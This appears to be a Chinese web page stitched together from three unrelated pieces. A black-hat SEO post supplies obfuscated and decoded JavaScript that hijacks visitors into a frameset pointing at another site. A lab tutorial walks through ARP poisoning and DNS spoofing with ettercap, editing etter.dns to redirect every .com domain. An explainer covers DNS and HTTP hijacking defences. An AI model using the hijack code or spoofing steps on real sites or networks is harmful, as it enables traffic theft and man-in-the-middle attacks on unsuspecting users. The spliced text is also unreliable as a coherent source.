说到黑帽什么的你们就非常的感兴趣，那也没办法，毕竟黑帽神秘又厉害，一周就有效果。

有关黑帽的具体操作网上少之又少，基本都标题党。

刚好最近碰到一个群友在吹他的快排，就拿他的来做个讲解。

我看了他的网站，就只能看出JS劫持，其他我也不懂，就讲讲这个吧。

暂时他有三个网站，指数5000左右的词都排首页前5位，大家先看看数据(提醒：拿别人的网站来分析，切勿放上网址及网站信息，断人财路等于杀人放火)

短时间内有这样的数据，50%做了快排。

这样看快排的几率90%了

这里提醒下各位站长，快排来得快去得也快，这是铁律。能给你几个月的快感，百度一更新就难翻身，切记切记。

但我个人比较向往黑帽，因为厉害啊。

看了他的网站代码，里面都有一个奇怪的JS代码

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65 \x3d

\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3e");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']

("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\"\x3c\x66\x72\x61\x6d\x65\x73\x65\x74 \x72\x6f\x77\x73\x3d\x27\x31\x30\x30\x25\x2c\x2a\x27

\x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x4e\x4f\x27 \x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27

\x66\x72\x61\x6d\x65\x73\x70\x61\x63\x69\x6e\x67\x3d\x27\x30\x27\x3e\"\x29\x3b");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']

("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\"\x3c\x66\x72\x61\x6d\x65 \x6e\x61\x6d\x65\x3d\x27\x6d\x61\x69\x6e\x27

\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\u4f60\u7684\u7f51\u5740\x2e\x63\x6f\x6d\x27

\x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\x79\x65\x73\x3e\"\x29\x3b");window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65\x6c\x6e']

('\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x2f\x66\x72\x61\x6d\x65\x73\x65\x74\x3e\x22\x29\x3b');window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]

['\x77\x72\x69\x74\x65\x6c\x6e']("\x\x33\x63\x2f\x73\x63\x72\x69\x70\x74\x3e");

是不是很奇怪

其实这个是经过加密的JS劫持代码，经常会出现在被黑的网站里面，劫持流量。

解密后发现都是指向一个网站，我们再看看那个网站的数据

能肯定这个估计就是主站了，手法就是通过快排一些网站上排位然后JS劫持流量到主站做排名。

那肯定你们会问，为什么这么大费周章不直接就去快排主站算了。

因为主站不能被K，而快排站无所谓，说明一下，百度蜘蛛现在是不能识别JS代码的，一旦惩罚，主站不会被牵连，

而且这位朋友手法成熟，快排站与主站做的行业和关键词都一致，一旦跳转，主站的流量来源都会是行业关键词，想法很好。

好了，点到为止，希望能给你们一点帮助，最后奉上JS代码。

document.writeln("<script language = javascript>");

document.writeln("document.write(\"<frameset rows='100%,*' frameborder='NO' border='0' framespacing='0'>\");");

document.writeln("document.write(\"<frame name='main' src='http://www.你的网址.com' scrolling=yes>\");");

document.writeln('document.write("</frameset>");');

document.writeln("\x3c/script>");

热点资讯

SEO基本功：站内优化的一些基本手段

SEO进阶必修课：如何创建和管理高质量关键词词库

春风十里，不如你

内容纯属技术记录，切勿用来做违法事情

环境

受害方：win 10

攻击方：kali linux

ip

win 10：10.1.1.20

kali linux：10.1.1.128

网关：10.1.1.1

攻击原理

两台电脑第一次联系时，

第一台会通过ARP广播的形式来获取对方mac地址

第二台收到第一台的ARP广播报文后通过解析再单播应答回去

至此，两台电脑成功建立联系；

假设有第三台电脑获得第一个ARP广播报文的内容后，

多次向报文中的源ip单播应答

则第一台将会把第三台电脑误认为是第二台电脑

至此，攻击成功。

准备工作

首先准备好一个网页，如下

将该网页放到如下位置

/var/www/html/

并改名为index.html

启动apache服务

systemctl start apache2

打开浏览器，检查网页是否正常运行

打开Ettercap的配置文件

leafpad /etc/ettercap/etter.dns

在最后面加上下面这行，保存退出

*.com A 10.1.1.128

到了这里，准备工作都差不多搞定了

接下来，ping下win 10，可以ping通

DNS劫持

打开Ettercap工具

ettercap -G

确定网卡是自己的eth0后，点击右上方的勾

接着，先停掉这个工具的运行，点击放大镜的图标

再点击下上面红色框的图标，就能发现win 10以及网关的ip

把网关ip给Target1，把win 10的ip给Target2

接着，选择框中的图标，点ARP poisoning选项

弹出来的界面全部勾上

点击省略号---Plugins---Manage plugins

双击dns_spoof

这时候，就可以发动攻击了

效果

win10用浏览器访问百度，劫持成功！

访问一个不存在的网站测试，劫持成功

再看后台，访问记录统统捕获

也就是说，不管现在这台win10访问什么网站都好，都只会访问到部署好的页面

是英俊潇洒，技术过硬的网盾运维攻城狮龟哥。

今天来跟大家聊一聊下载劫持，劫持主要分类两大类：DNS劫持和HTTP劫持。而HTTP劫持最常见的就是3XX跳转劫持，JS劫持以及HTML劫持。

众所周知，CDN的全称是Content Delivery Network，即内容分发网络，主要是提高网站的速度，可以优化网站的访问速度，提高网站的安全性和稳定性。

什么你只知道CDN能加速？那么CDN本身是一种DNS劫持你知道吗？不过放心，它是良性的，不同于黑客强制DNS把域名解析到自己的钓鱼IP上，CDN是让DNS主动配合，把域名解析到临近的服务器上。

同时服务器开启HTTP代理，让用户感觉不到CDN的存在。而且CDN劫持不像海王那样不挑食，劫持用户所有流量。CDN比较专一只“劫持”用户的静态资源访问，对于之前用户访问过的资源，CDN将直接从本地缓存里反馈给用户，因此速度有了很大的提升。

DNS劫持

正常DNS解析的流程是用户走localdns，通过运营商提供的递归DNS进行域名解析。而DNS劫持一般发生在LDNS（递归dns）这一层。

DNS劫持有这三种情况：

1.错误域名解析到纠错导航页面，导航页面存在广告；

2.错误域名解析到非正常页面 ；

3.直接将特点站点解析到恶意或者广告页面 。

HTTP劫持

HTTP劫持是指在传输过程中，劫持方伪装成目的服务器抢先给出了响应，使得客户端接受了劫持的响应而抛弃了正确的响应，就是先下手为强，后下手遭殃。甚至有时候劫持方会完全拦截用户的请求，目的服务器没有接受到任何请求。

在HTTP劫持中，3XX跳转，JS内容篡改以及html内容篡改都可能会发生。目前看3XX跳转和JS内容篡改比较常见。

劫持方想要达成的目的是默默的赚钱，因此这就决定了劫持方不可能猖獗到劫持整个域名的http请求。一般是通过过滤识别http请求的特征码来判断是否要进行劫持。

那么我们有两种防劫持思路

1.采用https协议加密请求。

2.隐藏http请求的特征，例如使用对称加密算法加密整个url。

https可以说是防止劫持的终极思路，但是https多了ssl握手的过程，会耗费一定的时间和性能，必须要考虑到时间影响和CDN节点的性能影响。另外https一般分为两种，一种是传统https（合用证书），一种是https sni。

目前的主流是https sni，但选用的时候必须确认好具体的业务需求，因为市面上还残留着一些老旧版本的浏览器。

URL加密也是经常用来防止劫持的做法。市面上的各大手机应用商店都采用了这种做法。相较于https，url加密的兼容性更好，并且对CDN节点带来的解密额外负担可以忽略，但是url加密需要CDN节点的密切配合。

通常是选中一种对称加密算法，调用加密后的url。用户向CDN节点发起请求，CDN节点会解密url，获取真实的url并且响应给用户。

由于劫持方一般通过对url进行匹配决定是否进行劫持，因此这种url加密的方式也可以很好的防止劫持。

通俗的来讲，DNS劫持就是你想去存钱运营商却把你拉到了劫匪手中；而HTTP劫持就是你从服务器买了一份饭电信给你放了一坨屎。

过以上的内容，相信机智的网友们已经知道了什么是DNS劫持和HTTP劫持以及应对方法，如果还有什么疑问欢迎来撩龟哥~